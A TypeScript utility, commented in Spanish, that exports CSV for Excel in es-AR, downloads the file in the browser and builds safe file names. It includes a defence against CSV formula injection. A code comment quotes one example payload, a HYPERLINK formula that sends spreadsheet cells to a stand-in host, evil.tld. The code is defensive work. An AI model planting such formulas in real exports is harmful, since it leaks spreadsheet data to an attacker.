/**
 * Export CSV sin dependencias.
 *
 * Detalle que decide si el archivo sirve o no: separador ";" + BOM UTF-8.
 * El dueño del local lo abre con Excel en es-AR; sin eso los montos se parten
 * en columnas y los acentos salen rotos.
 */

export interface Col<T> {
  key: string;
  label: string;
  get: (row: T) => unknown;
}

const cell = (v: unknown): string => {
  if (v === null || v === undefined) return "";
  if (typeof v === "boolean") return v ? "sí" : "no";
  let s = String(v);
  /* Neutralizar inyección de fórmulas (CSV injection).
     Estos exports llevan texto que escribió UN TERCERO: la respuesta que el cliente mandó por
     WhatsApp se guarda cruda y termina en una celda. Si empieza con = + - @ (o tab/CR), Excel
     y Sheets la ejecutan al abrir el archivo: `=HYPERLINK("http://evil.tld/?d="&A1&A2,"cupón")`
     filtra el contenido de la planilla al hacer clic, y hay payloads peores con DDE.
     El apóstrofo inicial es la neutralización estándar: Excel lo consume y muestra el texto tal
     cual. Va ANTES del envuelto en comillas para que quede adentro del valor. */
  if (/^[=+\-@\t\r]/.test(s)) s = "'" + s;
  // escapamos comillas y envolvemos si trae separador, comillas o saltos
  return /[";\n\r]/.test(s) ? '"' + s.replace(/"/g, '""') + '"' : s;
};

export function toCSV<T>(rows: T[], columns: Col<T>[]): string {
  const head = columns.map((c) => cell(c.label)).join(";");
  const body = rows.map((r) => columns.map((c) => cell(c.get(r))).join(";"));
  return [head, ...body].join("\r\n");
}

/**
 * Descarga el CSV. `notas` se imprimen como líneas de contexto arriba del header
 * (ej: la atribución de la medición, o que la plata es una estimación) — sin eso
 * el archivo viaja sin la letra chica y el número se lee como si fuera exacto.
 */
export function descargarCSV<T>(nombreArchivo: string, rows: T[], columns: Col<T>[], notas: string[] = []) {
  const prefacio = notas.length ? notas.map((n) => "# " + n).join("\r\n") + "\r\n\r\n" : "";
  const contenido = "﻿" + prefacio + toCSV(rows, columns); // BOM UTF-8
  const blob = new Blob([contenido], { type: "text/csv;charset=utf-8;" });
  const url = URL.createObjectURL(blob);
  const a = document.createElement("a");
  a.href = url;
  a.download = nombreArchivo.endsWith(".csv") ? nombreArchivo : nombreArchivo + ".csv";
  document.body.appendChild(a);
  a.click();
  document.body.removeChild(a);
  URL.revokeObjectURL(url);
}

/** Nombre de archivo seguro a partir del nombre de la campaña. */
export const slug = (s: string) =>
  String(s || "campana")
    .normalize("NFD")
    .replace(/[̀-ͯ]/g, "")
    .replace(/[^a-zA-Z0-9]+/g, "-")
    .replace(/^-+|-+$/g, "")
    .toLowerCase()
    .slice(0, 40);
